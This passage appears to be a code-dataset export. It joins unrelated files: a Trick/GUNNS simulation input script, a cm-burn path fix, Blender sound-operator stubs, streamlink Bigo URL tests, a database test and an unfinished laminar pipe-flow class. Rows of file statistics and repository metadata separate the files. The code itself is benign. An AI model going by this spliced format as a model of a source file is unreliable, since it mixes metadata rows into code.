trick.add_read(1.0, """massOverflow.fluid30.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid30.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid30.v2met1.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid30.netInput.v2met1.mNNominal = 2.0""")
trick.add_read(1.0, """massOverflow.fluid31.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid31.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid31.fire1.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.gsep13for.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.gsep13back.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.gpump23for.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid32.gpump23back.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid33.liqMembrane.mMalfMembraneDegradeFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid33.gasMembrane.mMalfMembraneDegradeFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid33.liqSource.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid33.gasSource.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid34.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid34.lpump12for.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid34.lpump12back.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.msorb13ad.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.msorb13des.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.msorb13des.mCompounds[0].mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid35.msorb13des.mCompounds[0].mMalfEfficiencyValue = 1.0""" )
trick.add_read(1.0, """massOverflow.fluid36.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid36.cond34.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid36.cond45.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid36.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid36.pchg14.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid37.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid37.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid37.sub14.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.sbound1.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid38.sbound2.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid39.cond02.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid39.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid39.reactor.setCurrent(10.0)""" )
trick.add_read(1.0, """massOverflow.fluid40.src01.setFlowDemand(0.0039)""" )
trick.add_read(1.0, """massOverflow.fluid40.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid40.cond56.mMalfBlockageFlag = False""" )
#trick.add_read(0.9, """massOverflow.fluid40.rca12.mDesorbFlag = False """)
trick.add_read(1.0, """massOverflow.fluid40.rca45.mCompounds[0].mAdsorbedMass = 0.02""" )
trick.add_read(1.0, """massOverflow.fluid40.rca45.mCompounds[1].mAdsorbedMass = 0.01""" )
trick.add_read(1.0, """massOverflow.fluid41.src01.setFlowDemand(0.01)""" )
trick.add_read(1.0, """massOverflow.fluid41.src02.setFlowDemand(0.01)""" )
trick.add_read(1.0, """massOverflow.fluid42.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid42.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid42.lsep1.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid43.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid43.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid43.v4meta1.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid43.v4meta1.mRespiration.mBreathsPerMinute = 12.0""" )
trick.add_read(1.0, """massOverflow.fluid44.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid44.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid44.Dhtc13.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid44.Dhtc23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45.pot20.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45over.cond01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45over.cond12.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid45over.pot20.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid46.src01.setFlowDemand(0.0039)""" )
trick.add_read(1.0, """massOverflow.fluid46.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid46.cond56.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid46.sorb45de.mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid46.sorb45de.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid46.sorb45de.mMalfBlockageValue = 0.0""" )
trick.add_read(1.0, """massOverflow.fluid47.src01.setFlowDemand(0.0039)""" )
trick.add_read(1.0, """massOverflow.fluid47.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid47.cond56.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid47.hsorb45de.mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid47.hsorb45de.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid47.hsorb45de.mMalfBlockageValue = 0.0""" )
trick.add_read(1.0, """massOverflow.fluid48.src01.setFlowDemand(0.0039)""" )
trick.add_read(1.0, """massOverflow.fluid48.src01.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid48.src01.mMalfBlockageValue = 0.0""" )
trick.add_read(1.0, """massOverflow.fluid48.cond23.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid48.cond56.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid48.msorb45de.mCompounds[0].mMalfEfficiencyFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid48.msorb45de.mCompounds[0].mMalfEfficiencyValue = 1.0""" )
trick.add_read(1.0, """massOverflow.fluid48.msorb45de.mMalfBlockageFlag = False""" )
trick.add_read(1.0, """massOverflow.fluid48.msorb45de.mMalfBlockageValue = 0.0""" )
#---------------------------------------------
# T+5 events (mid-test changes)
#---------------------------------------------
trick.add_read(5.0, """massOverflow.fluid15.vlv32.setPosition(0.0)""" )
trick.add_read(6.0, """massOverflow.fluid15.vlv24.setPosition(1.0)""" )
#---------------------------------------------
# T+10 events (stop some flows to allow settling before comparison)
#---------------------------------------------
trick.add_read(10.0, """massOverflow.fluid15.vlv24.setPosition(0.0)""" )
trick.add_read(10.0, """massOverflow.fluid16.src10.setFlowDemand(0.0)""" )
trick.add_read(10.0, """massOverflow.fluid17.pot20.setSourcePressure(0.0)""" )
trick.add_read(10.0, """massOverflow.fluid17.tank1.editPartialPressureRate(trick.FluidProperties.GUNNS_H2O)""" )
trick.add_read(10.0, """massOverflow.fluid18.pot20.setSourcePressure(0.0)""" )
trick.add_read(10.0, """massOverflow.fluid18.bln1.editPartialPressureRate(trick.FluidProperties.GUNNS_H2O)""" )
trick.add_read(10.0, """massOverflow.fluid33.liqMembrane.mMalfMembraneDegradeFlag = True""" )
trick.add_read(10.0, """massOverflow.fluid33.gasMembrane.mMalfMembraneDegradeFlag = True""" )
trick.add_read(10.0, """massOverflow.fluid33.liqSource.mMalfBlockageFlag = True""" )
trick.add_read(10.0, """massOverflow.fluid33.gasSource.mMalfBlockageFlag = True""" )
#---------------------------------------------
# Setup Data Logging
#---------------------------------------------
execfile("Log_setup/Log_setup.py")
log_setup(0.1)
#---------------------------------------------
# Call integration tests
#---------------------------------------------
trick_utest.unit_tests.enable()
trick_utest.unit_tests.set_file_name( "RUN_test/results/SIM_mass_overflow_int_test_results.xml" )
execfile("int_tests/SimTestSuite.py")
| 64.620455 | 167 | 0.752154 | 3,586 | 28,433 | 5.866425 | 0.102342 | 0.169321 | 0.146599 | 0.123592 | 0.896753 | 0.872273 | 0.815896 | 0.795741 | 0.771403 | 0.336502 | 0 | 0.084071 | 0.058735 | 28,433 | 439 | 168 | 64.767654 | 0.701977 | 0.063518 | 0 | 0.006154 | 0 | 0.006154 | 0.523564 | 0.457743 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d3bda72ee77dcb56a6d39b8531679a4ae91645c6 | 172 | py | Python | dev-scripts/q.py | cloudmesh-community/cm-burn | 536e2762d3c28ff539161dd3eb10c1cd2dedf9b1 | [
"Apache-2.0"
] | null | null | null | dev-scripts/q.py | cloudmesh-community/cm-burn | 536e2762d3c28ff539161dd3eb10c1cd2dedf9b1 | [
"Apache-2.0"
] | 1 | 2018-11-20T16:17:03.000Z | 2018-11-20T16:17:03.000Z | dev-scripts/q.py | cloudmesh-community/cm-burn | 536e2762d3c28ff539161dd3eb10c1cd2dedf9b1 | [
"Apache-2.0"
] | 3 | 2018-09-18T00:00:02.000Z | 2018-12-05T17:16:30.000Z | from cloudmesh.burn.sdcard import WindowsSDCard
card = WindowsSDCard()
card.fix_path("C:\Users\venkata/.cloudmesh/cmburn/images/2021-03-04-raspios-buster-armhf-lite.img")
| 34.4 | 99 | 0.802326 | 25 | 172 | 5.48 | 0.88 | 0.248175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04908 | 0.052326 | 172 | 4 | 100 | 43 | 0.791411 | 0 | 0 | 0 | 0 | 0.333333 | 0.476744 | 0.476744 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
312ce02cdf09f80628957030d276242f19a0d297 | 12,234 | py | Python | premade_modules/2.80/e5e885d0ecb9430a73e0a904cdb6035a2ef77e98/bpy/ops/sound.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | premade_modules/2.80/e5e885d0ecb9430a73e0a904cdb6035a2ef77e98/bpy/ops/sound.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | premade_modules/2.80/e5e885d0ecb9430a73e0a904cdb6035a2ef77e98/bpy/ops/sound.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | def bake_animation():
'''Update the audio animation cache
'''
pass
def mixdown(filepath="",
check_existing=True,
filter_blender=False,
filter_backup=False,
filter_image=False,
filter_movie=False,
filter_python=False,
filter_font=False,
filter_sound=True,
filter_text=False,
filter_btx=False,
filter_collada=False,
filter_alembic=False,
filter_folder=True,
filter_blenlib=False,
filemode=9,
relative_path=True,
display_type='DEFAULT',
sort_method='FILE_SORT_ALPHA',
accuracy=1024,
container='FLAC',
codec='FLAC',
format='S16',
bitrate=192,
split_channels=False):
'''Mix the scene’s audio to a sound file
:param filepath: File Path, Path to file
:type filepath: string, (optional, never None)
:param check_existing: Check Existing, Check and warn on overwriting existing files
:type check_existing: boolean, (optional)
:param filter_blender: Filter .blend files
:type filter_blender: boolean, (optional)
:param filter_backup: Filter .blend files
:type filter_backup: boolean, (optional)
:param filter_image: Filter image files
:type filter_image: boolean, (optional)
:param filter_movie: Filter movie files
:type filter_movie: boolean, (optional)
:param filter_python: Filter python files
:type filter_python: boolean, (optional)
:param filter_font: Filter font files
:type filter_font: boolean, (optional)
:param filter_sound: Filter sound files
:type filter_sound: boolean, (optional)
:param filter_text: Filter text files
:type filter_text: boolean, (optional)
:param filter_btx: Filter btx files
:type filter_btx: boolean, (optional)
:param filter_collada: Filter COLLADA files
:type filter_collada: boolean, (optional)
:param filter_alembic: Filter Alembic files
:type filter_alembic: boolean, (optional)
:param filter_folder: Filter folders
:type filter_folder: boolean, (optional)
:param filter_blenlib: Filter Blender IDs
:type filter_blenlib: boolean, (optional)
:param filemode: File Browser Mode, The setting for the file browser mode to load a .blend file, a library or a special file
:type filemode: int in [1, 9], (optional)
:param relative_path: Relative Path, Select the file relative to the blend file
:type relative_path: boolean, (optional)
:param display_type: Display TypeDEFAULT Default, Automatically determine display type for files.LIST_SHORT Short List, Display files as short list.LIST_LONG Long List, Display files as a detailed list.THUMBNAIL Thumbnails, Display files as thumbnails.
:type display_type: enum in ['DEFAULT', 'LIST_SHORT', 'LIST_LONG', 'THUMBNAIL'], (optional)
:param sort_method: File sorting modeFILE_SORT_ALPHA Sort alphabetically, Sort the file list alphabetically.FILE_SORT_EXTENSION Sort by extension, Sort the file list by extension/type.FILE_SORT_TIME Sort by time, Sort files by modification time.FILE_SORT_SIZE Sort by size, Sort files by size.
:type sort_method: enum in ['FILE_SORT_ALPHA', 'FILE_SORT_EXTENSION', 'FILE_SORT_TIME', 'FILE_SORT_SIZE'], (optional)
:param accuracy: Accuracy, Sample accuracy, important for animation data (the lower the value, the more accurate)
:type accuracy: int in [1, inf], (optional)
:param container: Container, File formatAC3 ac3, Dolby Digital ATRAC 3.FLAC flac, Free Lossless Audio Codec.MATROSKA mkv, Matroska.MP2 mp2, MPEG-1 Audio Layer II.MP3 mp3, MPEG-2 Audio Layer III.OGG ogg, Xiph.Org Ogg Container.WAV wav, Waveform Audio File Format.
:type container: enum in ['AC3', 'FLAC', 'MATROSKA', 'MP2', 'MP3', 'OGG', 'WAV'], (optional)
:param codec: Codec, Audio CodecAAC AAC, Advanced Audio Coding.AC3 AC3, Dolby Digital ATRAC 3.FLAC FLAC, Free Lossless Audio Codec.MP2 MP2, MPEG-1 Audio Layer II.MP3 MP3, MPEG-2 Audio Layer III.PCM PCM, Pulse Code Modulation (RAW).VORBIS Vorbis, Xiph.Org Vorbis Codec.
:type codec: enum in ['AAC', 'AC3', 'FLAC', 'MP2', 'MP3', 'PCM', 'VORBIS'], (optional)
:param format: Format, Sample formatU8 U8, 8 bit unsigned.S16 S16, 16 bit signed.S24 S24, 24 bit signed.S32 S32, 32 bit signed.F32 F32, 32 bit floating point.F64 F64, 64 bit floating point.
:type format: enum in ['U8', 'S16', 'S24', 'S32', 'F32', 'F64'], (optional)
:param bitrate: Bitrate, Bitrate in kbit/s
:type bitrate: int in [32, 512], (optional)
:param split_channels: Split channels, Each channel will be rendered into a mono file
:type split_channels: boolean, (optional)
'''
pass
def open(filepath="",
filter_blender=False,
filter_backup=False,
filter_image=False,
filter_movie=True,
filter_python=False,
filter_font=False,
filter_sound=True,
filter_text=False,
filter_btx=False,
filter_collada=False,
filter_alembic=False,
filter_folder=True,
filter_blenlib=False,
filemode=9,
relative_path=True,
show_multiview=False,
use_multiview=False,
display_type='DEFAULT',
sort_method='FILE_SORT_ALPHA',
cache=False,
mono=False):
'''Load a sound file
:param filepath: File Path, Path to file
:type filepath: string, (optional, never None)
:param filter_blender: Filter .blend files
:type filter_blender: boolean, (optional)
:param filter_backup: Filter .blend files
:type filter_backup: boolean, (optional)
:param filter_image: Filter image files
:type filter_image: boolean, (optional)
:param filter_movie: Filter movie files
:type filter_movie: boolean, (optional)
:param filter_python: Filter python files
:type filter_python: boolean, (optional)
:param filter_font: Filter font files
:type filter_font: boolean, (optional)
:param filter_sound: Filter sound files
:type filter_sound: boolean, (optional)
:param filter_text: Filter text files
:type filter_text: boolean, (optional)
:param filter_btx: Filter btx files
:type filter_btx: boolean, (optional)
:param filter_collada: Filter COLLADA files
:type filter_collada: boolean, (optional)
:param filter_alembic: Filter Alembic files
:type filter_alembic: boolean, (optional)
:param filter_folder: Filter folders
:type filter_folder: boolean, (optional)
:param filter_blenlib: Filter Blender IDs
:type filter_blenlib: boolean, (optional)
:param filemode: File Browser Mode, The setting for the file browser mode to load a .blend file, a library or a special file
:type filemode: int in [1, 9], (optional)
:param relative_path: Relative Path, Select the file relative to the blend file
:type relative_path: boolean, (optional)
:param show_multiview: Enable Multi-View
:type show_multiview: boolean, (optional)
:param use_multiview: Use Multi-View
:type use_multiview: boolean, (optional)
:param display_type: Display TypeDEFAULT Default, Automatically determine display type for files.LIST_SHORT Short List, Display files as short list.LIST_LONG Long List, Display files as a detailed list.THUMBNAIL Thumbnails, Display files as thumbnails.
:type display_type: enum in ['DEFAULT', 'LIST_SHORT', 'LIST_LONG', 'THUMBNAIL'], (optional)
:param sort_method: File sorting modeFILE_SORT_ALPHA Sort alphabetically, Sort the file list alphabetically.FILE_SORT_EXTENSION Sort by extension, Sort the file list by extension/type.FILE_SORT_TIME Sort by time, Sort files by modification time.FILE_SORT_SIZE Sort by size, Sort files by size.
:type sort_method: enum in ['FILE_SORT_ALPHA', 'FILE_SORT_EXTENSION', 'FILE_SORT_TIME', 'FILE_SORT_SIZE'], (optional)
:param cache: Cache, Cache the sound in memory
:type cache: boolean, (optional)
:param mono: Mono, Merge all the sound’s channels into one
:type mono: boolean, (optional)
'''
pass
def open_mono(filepath="",
filter_blender=False,
filter_backup=False,
filter_image=False,
filter_movie=True,
filter_python=False,
filter_font=False,
filter_sound=True,
filter_text=False,
filter_btx=False,
filter_collada=False,
filter_alembic=False,
filter_folder=True,
filter_blenlib=False,
filemode=9,
relative_path=True,
show_multiview=False,
use_multiview=False,
display_type='DEFAULT',
sort_method='FILE_SORT_ALPHA',
cache=False,
mono=True):
'''Load a sound file as mono
:param filepath: File Path, Path to file
:type filepath: string, (optional, never None)
:param filter_blender: Filter .blend files
:type filter_blender: boolean, (optional)
:param filter_backup: Filter .blend files
:type filter_backup: boolean, (optional)
:param filter_image: Filter image files
:type filter_image: boolean, (optional)
:param filter_movie: Filter movie files
:type filter_movie: boolean, (optional)
:param filter_python: Filter python files
:type filter_python: boolean, (optional)
:param filter_font: Filter font files
:type filter_font: boolean, (optional)
:param filter_sound: Filter sound files
:type filter_sound: boolean, (optional)
:param filter_text: Filter text files
:type filter_text: boolean, (optional)
:param filter_btx: Filter btx files
:type filter_btx: boolean, (optional)
:param filter_collada: Filter COLLADA files
:type filter_collada: boolean, (optional)
:param filter_alembic: Filter Alembic files
:type filter_alembic: boolean, (optional)
:param filter_folder: Filter folders
:type filter_folder: boolean, (optional)
:param filter_blenlib: Filter Blender IDs
:type filter_blenlib: boolean, (optional)
:param filemode: File Browser Mode, The setting for the file browser mode to load a .blend file, a library or a special file
:type filemode: int in [1, 9], (optional)
:param relative_path: Relative Path, Select the file relative to the blend file
:type relative_path: boolean, (optional)
:param show_multiview: Enable Multi-View
:type show_multiview: boolean, (optional)
:param use_multiview: Use Multi-View
:type use_multiview: boolean, (optional)
:param display_type: Display TypeDEFAULT Default, Automatically determine display type for files.LIST_SHORT Short List, Display files as short list.LIST_LONG Long List, Display files as a detailed list.THUMBNAIL Thumbnails, Display files as thumbnails.
:type display_type: enum in ['DEFAULT', 'LIST_SHORT', 'LIST_LONG', 'THUMBNAIL'], (optional)
:param sort_method: File sorting modeFILE_SORT_ALPHA Sort alphabetically, Sort the file list alphabetically.FILE_SORT_EXTENSION Sort by extension, Sort the file list by extension/type.FILE_SORT_TIME Sort by time, Sort files by modification time.FILE_SORT_SIZE Sort by size, Sort files by size.
:type sort_method: enum in ['FILE_SORT_ALPHA', 'FILE_SORT_EXTENSION', 'FILE_SORT_TIME', 'FILE_SORT_SIZE'], (optional)
:param cache: Cache, Cache the sound in memory
:type cache: boolean, (optional)
:param mono: Mono, Mixdown the sound to mono
:type mono: boolean, (optional)
'''
pass
def pack():
'''Pack the sound into the current blend file
'''
pass
def unpack(method='USE_LOCAL', id=""):
'''Unpack the sound to the samples filename
:param method: Method, How to unpack
:type method: enum in ['USE_LOCAL', 'WRITE_LOCAL', 'USE_ORIGINAL', 'WRITE_ORIGINAL'], (optional)
:param id: Sound Name, Sound data-block name to unpack
:type id: string, (optional, never None)
'''
pass
def update_animation_flags():
'''Update animation flags
'''
pass
| 46.51711 | 298 | 0.688818 | 1,589 | 12,234 | 5.154185 | 0.118943 | 0.101587 | 0.119658 | 0.11746 | 0.822711 | 0.819048 | 0.811722 | 0.811722 | 0.806716 | 0.806716 | 0 | 0.009714 | 0.225846 | 12,234 | 262 | 299 | 46.694656 | 0.855031 | 0.754373 | 0 | 0.7875 | 0 | 0 | 0.036226 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0875 | false | 0.0875 | 0 | 0 | 0.0875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
313ec7e8b0a7b59e2fb72a2b08b03c94678b17f5 | 1,645 | py | Python | tests/plugins/test_bigo.py | naeioi/streamlink | 967aae613dba048936fcf763c493a2f6e12183f8 | [
"BSD-2-Clause"
] | 1 | 2020-06-19T08:34:23.000Z | 2020-06-19T08:34:23.000Z | tests/plugins/test_bigo.py | naeioi/streamlink | 967aae613dba048936fcf763c493a2f6e12183f8 | [
"BSD-2-Clause"
] | null | null | null | tests/plugins/test_bigo.py | naeioi/streamlink | 967aae613dba048936fcf763c493a2f6e12183f8 | [
"BSD-2-Clause"
] | null | null | null | import unittest
from streamlink.plugins.bigo import Bigo
class TestPluginBigo(unittest.TestCase):
def test_can_handle_url(self):
# Correct urls
self.assertTrue(Bigo.can_handle_url("http://bigo.tv/00000000"))
self.assertTrue(Bigo.can_handle_url("https://bigo.tv/00000000"))
self.assertTrue(Bigo.can_handle_url("https://www.bigo.tv/00000000"))
self.assertTrue(Bigo.can_handle_url("http://www.bigo.tv/00000000"))
self.assertTrue(Bigo.can_handle_url("http://www.bigo.tv/fancy1234"))
self.assertTrue(Bigo.can_handle_url("http://www.bigo.tv/abc.123"))
self.assertTrue(Bigo.can_handle_url("http://www.bigo.tv/000000.00"))
# Old URLs don't work anymore
self.assertFalse(Bigo.can_handle_url("http://live.bigo.tv/00000000"))
self.assertFalse(Bigo.can_handle_url("https://live.bigo.tv/00000000"))
self.assertFalse(Bigo.can_handle_url("http://www.bigoweb.co/show/00000000"))
self.assertFalse(Bigo.can_handle_url("https://www.bigoweb.co/show/00000000"))
self.assertFalse(Bigo.can_handle_url("http://bigoweb.co/show/00000000"))
self.assertFalse(Bigo.can_handle_url("https://bigoweb.co/show/00000000"))
# Wrong URL structure
self.assertFalse(Bigo.can_handle_url("ftp://www.bigo.tv/00000000"))
self.assertFalse(Bigo.can_handle_url("https://www.bigo.tv/show/00000000"))
self.assertFalse(Bigo.can_handle_url("http://www.bigo.tv/show/00000000"))
self.assertFalse(Bigo.can_handle_url("http://bigo.tv/show/00000000"))
self.assertFalse(Bigo.can_handle_url("https://bigo.tv/show/00000000"))
| 53.064516 | 85 | 0.703951 | 231 | 1,645 | 4.844156 | 0.177489 | 0.152815 | 0.203753 | 0.257373 | 0.806971 | 0.80429 | 0.776586 | 0.709562 | 0.709562 | 0.697945 | 0 | 0.094604 | 0.132523 | 1,645 | 30 | 86 | 54.833333 | 0.689559 | 0.036474 | 0 | 0 | 0 | 0 | 0.330803 | 0.016445 | 0 | 0 | 0 | 0 | 0.818182 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
317a17ddef06ca9f8f3906c5462ecdd570cf0c29 | 111 | py | Python | tests/unit/db_test.py | backdfund/analyzer | 3069008aad80a2131b2c33d6d3dabd4f22e0a946 | [
"MIT"
] | 18 | 2021-02-17T23:04:03.000Z | 2022-02-02T23:07:32.000Z | tests/unit/db_test.py | Guangye-C/analyzer | 3069008aad80a2131b2c33d6d3dabd4f22e0a946 | [
"MIT"
] | null | null | null | tests/unit/db_test.py | Guangye-C/analyzer | 3069008aad80a2131b2c33d6d3dabd4f22e0a946 | [
"MIT"
] | 2 | 2021-09-12T03:12:44.000Z | 2022-03-30T09:34:40.000Z | from backd import db
def test_count_events():
assert db.count_events() == len(list(db.iterate_events()))
| 18.5 | 62 | 0.720721 | 17 | 111 | 4.470588 | 0.705882 | 0.289474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144144 | 111 | 5 | 63 | 22.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
317ab34e058c0ef03181c6729f08636f18434b2e | 14,171 | py | Python | rheoflow/pipe.py | rheopy/rheoflow | 1c8cd55a36ce1f60b4c968a5499d49f57b4c8d77 | [
"MIT"
] | 2 | 2021-07-15T18:47:35.000Z | 2022-03-16T00:06:38.000Z | rheoflow/pipe.py | rheopy/rheoflow | 1c8cd55a36ce1f60b4c968a5499d49f57b4c8d77 | [
"MIT"
] | 1 | 2021-08-28T12:38:04.000Z | 2021-08-28T12:38:04.000Z | rheoflow/pipe.py | rheopy/rheoflow | 1c8cd55a36ce1f60b4c968a5499d49f57b4c8d77 | [
"MIT"
] | 1 | 2021-03-01T14:35:09.000Z | 2021-03-01T14:35:09.000Z | import numpy as np
import scipy.optimize as spo
import scipy.integrate as spi
from scipy.integrate import odeint
import matplotlib.pyplot as plt
from . import viscosity
class laminar:
"""
This class contains a variety of methods for computing quantities of interest for laminar flow in a tube.
The argument viscosity requires a function (or class with method) calc_visc with parameters already set
and the shear rate as it's only argument. Default values are provided. A default visosity function is provided
"""
def __init__(self,name='Default',density=1000.,radius=.01,length=1.,viscosity=viscosity.newtonian(name='default',mu=1.), \
scale=1.e+6,pressure_drop = None, q = None):
self.name=name
self.__density = density
self.__radius=radius
self.__length=length
self._viscosity = viscosity
self.__r = 0.
self.scale=scale
if pressure_drop:
self.pressure_drop = pressure_drop
else:
self.pressure_drop = None
if q:
self.q = q
self.__q = q
else:
self.__q = None
def __str__(self):
return str('Name ='+self.name+'\n'+
'Radius ='+str(self.__radius)+'\n'+
'Length ='+str(self.__length)+'\n'+
'Pressure drop ='+str(self.__pressure_drop)+'\n'+
'Flow rate ='+str(self.__q)+'\n'+
'Shear rate wall = '+str(self._shear_rate_wall()))
def _shear_rate_equation(self,solve_rate,dp):
return solve_rate * self._viscosity.calc_visc(solve_rate) - \
dp/self.__length*self.__r/2.
def shear_rate(self,rad,dp):
"""
This method computes the shear rate at a radial position (rad) that is the only argument.
"""
self.__r = rad
return spo.brentq(lambda x: self._shear_rate_equation(x,dp), 0.,1.e+6)
def vz(self,rad,dp):
"""
This method computes the axial velocity vz at a radial position, rad.
"""
# (-) sign deals with vz<0 whehn pressuredrop>0
#return -spi.quad(self.shear_rate,self.__radius,rad)[0]
